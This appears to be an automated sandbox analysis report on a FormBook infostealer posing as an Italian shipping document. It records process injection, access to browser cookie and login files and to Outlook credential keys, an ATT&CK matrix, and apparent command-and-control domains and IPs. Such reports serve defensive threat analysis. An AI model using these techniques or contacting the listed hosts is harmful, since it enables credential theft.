            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\taskkill.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\taskkill.exeThread register set: target process: 7812Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 211008Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: AWB_5771388044 Documenti di spedizione.exe, pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: pSySrLvnviNdEH.exe, 00000005.00000000.2050338043.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, pSySrLvnviNdEH.exe, 00000005.00000002.3592546456.00000000011F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_XP
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_XPe
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_VISTA
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_7
            Source: AWB_5771388044 Documenti di spedizione.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		2
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515429 Sample: AWB_5771388044 Documenti di... Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 31 www.uburn.xyz 2->31 33 www.wdeb18.top 2->33 35 12 other IPs or domains 2->35 39 Multi AV Scanner detection for domain / URL 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 47 6 other signatures 2->47 10 AWB_5771388044 Documenti di spedizione.exe 1 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 13 svchost.exe 10->13         started        process6 signatures7 61 Maps a DLL or memory area into another process 13->61 16 pSySrLvnviNdEH.exe 13->16 injected process8 dnsIp9 25 www.uburn.xyz 67.223.117.189, 49746, 49747, 49748 VIMRO-AS15189US United States 16->25 27 www.trapkitten.website 195.161.68.8, 49758, 49759, 49760 RTCOMM-ASRU Russian Federation 16->27 29 6 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 taskkill.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            AWB_5771388044 Documenti di spedizione.exe68%ReversingLabsWin32.Backdoor.FormBook
            AWB_5771388044 Documenti di spedizione.exe47%VirustotalBrowse
            AWB_5771388044 Documenti di spedizione.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            tempatmudisini01.click5%VirustotalBrowse
            www.palcoconnector.net0%VirustotalBrowse
            dns.ladipage.com0%VirustotalBrowse
            wdeb18.top0%VirustotalBrowse
            www.trapkitten.website2%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.wdeb18.top2%VirustotalBrowse
            www.tmstore.click2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%0%Avira URL Cloudsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&0%Avira URL Cloudsafe
            https://dts.gnpge.com0%Avira URL Cloudsafe
            https://reg.ru0%Avira URL Cloudsafe
            http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns0%Avira URL Cloudsafe
            http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2BQUT7Wmg0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto0%VirustotalBrowse
            https://dts.gnpge.com0%VirustotalBrowse
            https://reg.ru0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            http://www.albero-dveri.online/vyk8/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%VirustotalBrowse
            http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%VirustotalBrowse
            http://i2.cdn-image.com/__media__/pics/28903/search.png)0%VirustotalBrowse
            http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net0%Avira URL Cloudsafe
            http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%20%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%VirustotalBrowse
            http://www.sppsuperplast.online/og3c/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%VirustotalBrowse
            https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://www.albero-dveri.online0%Avira URL Cloudsafe
            http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net0%VirustotalBrowse
            http://www.sppsuperplast.online/og3c/1%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%VirustotalBrowse
            http://www.palcoconnector.net/c45k/0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
            https://jino.ru0%Avira URL Cloudsafe
            http://www.wdeb18.top/66vh/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://www.palcoconnector.net/display.cfm0%Avira URL Cloudsafe
            http://www.wdeb18.top/66vh/1%VirustotalBrowse
            https://delivery.consentmanager.net0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://www.palcoconnector.net/c45k/1%VirustotalBrowse
            https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
            http://www.uburn.xyz/unks/0%Avira URL Cloudsafe
            http://www.trapkitten.website/0dae/0%Avira URL Cloudsafe
            https://jino.ru0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%VirustotalBrowse
            http://www.uburn.xyz/unks/1%VirustotalBrowse
            http://www.Palcoconnector.net0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu0%Avira URL Cloudsafe
            https://www.tmstore.click/pk64/?4rl8h=D2L0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://www.Palcoconnector.net0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://www.2bhp.com/znmp/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%VirustotalBrowse
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tempatmudisini01.click
            		103.21.221.4
            		truefalseunknown
            www.palcoconnector.net
            		208.91.197.27
            		truetrueunknown
            www.albero-dveri.online
            		194.58.112.174
            		truetrue
              		unknown
              dns.ladipage.com
              		54.179.173.60
              		truetrueunknown
              www.uburn.xyz
              		67.223.117.189
              		truetrue
                		unknown
                wdeb18.top
                		206.119.82.147
                		truetrueunknown
                www.trapkitten.website
                		195.161.68.8
                		truetrueunknown
                www.2bhp.com
                		81.88.63.46
                		truetrue
                  		unknown
                  natroredirect.natrocdn.com
                  		85.159.66.93
                  		truetrueunknown
                  www.wdeb18.top
                  		unknown
                  		unknowntrueunknown
                  www.tmstore.click
                  		unknown
                  		unknowntrueunknown
                  www.tempatmudisini01.click
                  		unknown
                  		unknowntrue
                    		unknown
                    www.sppsuperplast.online
                    		unknown
                    		unknowntrue
